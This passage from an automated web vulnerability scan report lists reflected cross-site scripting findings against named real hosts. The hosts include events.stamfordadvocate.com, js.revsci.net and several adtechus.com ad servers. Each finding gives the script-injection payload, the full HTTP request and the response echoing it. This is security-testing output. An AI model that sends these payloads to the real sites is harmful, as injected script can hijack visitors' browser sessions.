Path:   /partner_json/search

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 923eb<script>alert(1)</script>b21e5cd833e was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=3&advq=true&sponsored=true&srss=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&rand_spn=15&st=event923eb<script>alert(1)</script>b21e5cd833e&jsonsp=jsp_0 HTTP/1.1
Host: events.stamfordadvocate.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1316294655808; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=81258325.768035182.1316294656.1316294656.1316294656.1; __utmb=81258325.1.10.1316294656; __utmc=81258325; __utmz=81258325.1316294656.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/the-advocate.php

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:23:37 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 18
ETag: "d24ca5f83bb73fad09c3d9e4d5ed010c"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: e9c3a577f1b28442a5cee255c0adc7128e5eb872
Z-REQUEST-HANDLED-BY: www30
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 131

{"rsp":{"status":"failed","msg":"Invalid search: event923eb<script>alert(1)</script>b21e5cd833e is not a valid search category."}}
4.201. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload aa16e<script>alert(1)</script>54003843fac was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=F09828aa16e<script>alert(1)</script>54003843fac&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 16:27:43 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 16:27:43 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:43 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "F09828AA16E<SCRIPT>ALERT(1)</SCRIPT>54003843FAC" was not recognized.
*/
4.202. http://mpd.mxptint.net/1/S74.API/G1/T124/js [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mpd.mxptint.net
Path:   /1/S74.API/G1/T124/js

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f257"%3balert(1)//71106b543ae was submitted in the mid parameter. This input was echoed as 9f257";alert(1)//71106b543ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/S74.API/G1/T124/js?siz=300x250&mid=B25_27703F6F_10686B69f257"%3balert(1)//71106b543ae&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605 HTTP/1.1
Host: mpd.mxptint.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mxpim=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Sat, 17 Sep 2011 16:52:38 GMT
Content-Length: 772

document.write('\r\n');

var ftClick = "http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B69F257";ALERT(1)//71106B543AE%3f";
var ftX = "";
var ftY = "";
var ftZ = "";
var ftContent = "";
var ft300x250_OOBclickTrack = "";
var ftRandom = Math.random()*1000000;
var ftBuildTag1 = "<scr";
var ftBuildTag2 = "</";
va
...[SNIP]...
4.203. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba219"-alert(1)-"1d48281eaef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naiba219"-alert(1)-"1d48281eaef/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naiba219"-alert(1)-"1d48281eaef/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...
4.204. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b43f8"><script>alert(1)</script>3f0a4d191aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naib43f8"><script>alert(1)</script>3f0a4d191aa/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.ad.us-ec.adtechus.com/naib43f8"><script>alert(1)</script>3f0a4d191aa/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.205. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60c0f"-alert(1)-"34738e6ef28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php60c0f"-alert(1)-"34738e6ef28?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php60c0f"-alert(1)-"34738e6ef28?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...
4.206. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9dc2"><script>alert(1)</script>41cccc8b2cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.phpd9dc2"><script>alert(1)</script>41cccc8b2cf?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:07 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.ad.us-ec.adtechus.com/nai/daa.phpd9dc2"><script>alert(1)</script>41cccc8b2cf?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.207. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7256b"-alert(1)-"8127a34a34e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai7256b"-alert(1)-"8127a34a34e/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai7256b"-alert(1)-"8127a34a34e/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...
4.208. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64078"><script>alert(1)</script>01878aa18cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai64078"><script>alert(1)</script>01878aa18cb/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adserver.adtechus.com/nai64078"><script>alert(1)</script>01878aa18cb/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.209. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6148"><script>alert(1)</script>bd921d56a6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.phpc6148"><script>alert(1)</script>bd921d56a6f?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adserver.adtechus.com/nai/daa.phpc6148"><script>alert(1)</script>bd921d56a6f?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.210. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b222a"-alert(1)-"ac98e5d2ae2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpb222a"-alert(1)-"ac98e5d2ae2?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpb222a"-alert(1)-"ac98e5d2ae2?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...
4.211. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de933"><script>alert(1)</script>d0f8dd64c38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naide933"><script>alert(1)</script>d0f8dd64c38/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adserverec.adtechus.com/naide933"><script>alert(1)</script>d0f8dd64c38/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.212. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66562"-alert(1)-"f0b38dc9031 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai66562"-alert(1)-"f0b38dc9031/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
